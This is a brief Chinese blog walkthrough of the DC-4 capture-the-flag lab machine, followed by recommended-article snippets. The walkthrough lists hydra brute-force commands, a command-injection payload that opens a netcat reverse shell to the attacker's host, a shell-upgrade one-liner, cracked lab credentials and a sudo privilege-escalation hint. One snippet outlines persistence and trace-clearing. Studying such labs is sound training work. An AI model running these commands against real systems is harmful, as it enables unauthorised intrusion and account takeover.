DC-4靶机

最新推荐文章于 2024-10-06 21:18:37 发布

Clearlove~7

最新推荐文章于 2024-10-06 21:18:37 发布

阅读量415

点赞数 5

文章标签：笔记

本文链接：https://blog.csdn.net/2401_84564260/article/details/141206052

版权

查看靶机的mac地址

使用kail扫描ip

扫描端口

目录扫描

访问IP

使用hydra进行爆破密码

hydra -l admin -P rockyou.txt 192.168.154.139 http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout" -F

进行登录

使用burp进行抓包

查看/etc/passwd

进行反弹shell

radio=nc+-e/bin/bash+192.168.254.129+6768&
nc -lvnp 6768

进行提权

使用python3提升交互性

python3 -c 'import pty;pty.spawn("/bin/bash")'

sudo -l 但是不知道密码

jim目录下有密码字典将字典下载下来使用hydra进行爆破

hydra -L Username.txt -P old-passwords.bak ssh://192.168.254.153 
jim
jibril04

ssh连接jim

说有一封信在/var/mail

有charles密码就是^xHhA&hvim0y 切换到charles

sudo -l ,teehee是个小众的linux编辑器。如果有sudo权限。可以利用其来提权

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Clearlove~7

关注关注

5
点赞
踩
8

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

DC-4靶机渗透

weixin_45349299的博客

12-21

1083

开放的端口：22 => ssh服务 ---- OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)80 => http服务 ---- nginx 1.15.10扫描出来的网站目录。

DC-4靶机渗透测试

读书买花长大

04-18

817

DC-4

参与评论您还未登录，请先登录后发表或查看评论

DC-4靶机攻略

真正的大师，永远都怀着一颗学徒的心。

07-27

1139

文章目录前言一、DC-4的信息收集1.确定IP，端口号；2 访问目标80端口，收集信息二、通过暴力破解密码，成功登陆1.确定密码字典,利用hydra进行爆破。三. 抓包改命令，为我所用1.分析界面2.BP抓包，修改命令3 进入用户家目录收集信息4.hydra爆破ssh账户密码。四.ssh登陆总结- - -思路前言在本章将介绍DC-4靶机的攻略。 DC-1攻略：点击这里！ DC-2攻略：点击这里！提示：以下是本篇文章正文内容，下面案例可供参考一、DC-4的信息收集 1.确定IP，端口号；命令：n

DC-4靶机渗透测试详细教程

啊醒的博客

05-04

3980

DC-4靶机渗透测试详细教程

dc-4 靶机渗透学习

03-19

3173

信息收集第一步还是老办法，探测主机存活。 nmap -sP 192.168.202.0/24 通过推断得出192.168.202.142是靶机，具体请看dc-2、dc-3，对靶机进行端口扫描。 nmap -A -p- -v 192.168.202.142 发现22、80端口开启，访问一下80端口，发现是个登录页面。用Wappalyzer识别框架，没试别出，查看源代码发现只是一个简单的登录界面这种情况感觉没必要再用nikto扫描了，尝试用bp爆...

vulnhub DC-4靶机实战

m0_51195235的博客

10-04

2308

vulnhub DC-4靶机实战

DC-4 靶机详解（两个解法版本）

TonyChaoWei的博客

04-11

1020

DC-4 两钟解法

DC-4靶机详细渗透过程

MRS_jianai的博客

11-30

618

dc4靶机渗透教程

DC-4靶机通关

qq_63831588的博客

07-23

1102

teehee提权，bp爆破

DC-4靶机提权超详细过程

02-29

### DC-4靶机提权超详细过程 #### 一、前言本文将详细介绍如何在DC-4靶机上进行权限提升的过程，包括利用Kali Linux进行初始渗透测试、爆破登录凭证、获取敏感信息以及最终实现权限提升的具体步骤。通过本教程，...

dc-4靶机练习.docx

01-02

靶机在web信息收集，burp获取登陆用户名和密码。第二步：利用反弹shell后发现一封邮件，拿到新用户的登陆口令。第三步：通过sudo -l]发现不用登录root可以使用的命令 [teehee --help][teehee -a]增加用户，具有...

【vulnhub】---DC-4靶机

qq_43168364的博客

08-21

1980

目录一、实验环境二、信息收集三、渗透测试　　1、漏洞发现和利用　　2、提权四、总结一、实验环境靶机：DC-4靶机(192.168.15.152) 攻击机：kali Linux(192.168.15.129) 二、信息收集主机发现端口扫描版本探测和操作系统识别 web指纹识别网站目录扫描三、渗透测试 1、漏洞发现和利用 2、提权四、总结渗透步骤渗透思路 ......

（笔记）第三期书生·浦语大模型实战营（十一卷王场）–书生基础岛第5关---XTuner 微调个人小助手认知

最新发布

haidizym的博客

10-06

436

学员闯关手册：https://aicarrier.feishu.cn/wiki/ZcgkwqteZi9s4ZkYr0Gcayg1n1g?课程视频：https://www.bilibili.com/video/BV1tz421B72y/课程文档：关卡作业：https://github.com/InternLM/Tutorial/blob/camp3/docs/L1/XTuner/task.md开发机平台：https://studio.intern-ai.org.cn/

C++学习笔记----8、掌握类与对象（四）---- 不同类型的数据成员（1）

weixin_71738303的博客

10-05

939

c++对于数据成员给了你许多选项。除了在类中声明简单的数据成员，可以生成静态数据成员供所有类的对象共享，const成员，引用成员，reference-to-const成员，等等。本节我们解释一下这些不同类型的数据成员的细节。

（笔记）第三期书生·浦语大模型实战营（十一卷王场）--书生入门岛通关第2关Python 基础知识

haidizym的博客

10-02

558

学员闯关手册：https://aicarrier.feishu.cn/wiki/ZcgkwqteZi9s4ZkYr0Gcayg1n1g?课程视频：https://www.bilibili.com/video/BV1mS421X7h4/课程文档：https://github.com/InternLM/Tutorial/tree/camp3/docs/L0/Python。

强化学习笔记之【DDPG算法】

rvdgdsva的博客

10-06

843

强化学习第2篇.强化学习方向的学习者可以参考或者复刻

【韩顺平Java笔记】第6章：数组、排序和查找

随手写写

10-02

837

排序是将多个数据，依指定的顺序进行排列的过程。

【数学分析笔记】第4章第4节复合函数求导法则及其应用（2）

随手写写

10-05

802

【例4.4.3】ye1cosx，求y′【解】y′e1cosx⋅21cosx1⋅−sinx−21cosxsinxe1cosxyfxuxvx两边取对数得lnylnfxvxlnux等式两边同时对x求导得y1y′uxvx1y′v′xlnuxuxvxu′xy′xuxvxv′xln。

渗透DC-1靶机设计思路

05-24

设计思路： 1. 确定目标：首先需要确定渗透的目标，即DC-1靶机。 2. 收集信息：收集关于DC-1的信息，如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞：使用漏洞扫描工具如Nessus、OpenVAS等扫描DC-1，寻找漏洞。 4. 渗透攻击：根据扫描结果，利用漏洞进行攻击。可以使用一些常见的攻击手段，如SQL注入、XSS、文件包含、远程代码执行等。 5. 提升权限：在攻击成功后，需要提升自己的权限，获取更高的权限。可以使用一些提权工具，如Metasploit。 6. 横向移动：在获得了足够的权限后，可以尝试横向移动，进一步渗透网络。 7. 维持访问：在渗透成功后，需要维持访问，以便长期监控目标。 8. 清理痕迹：在攻击结束后，需要清理自己留下的痕迹，以免被发现。以上是一个基本的渗透DC-1靶机的设计思路，但是具体实施过程中需要根据实际情况进行调整和优化。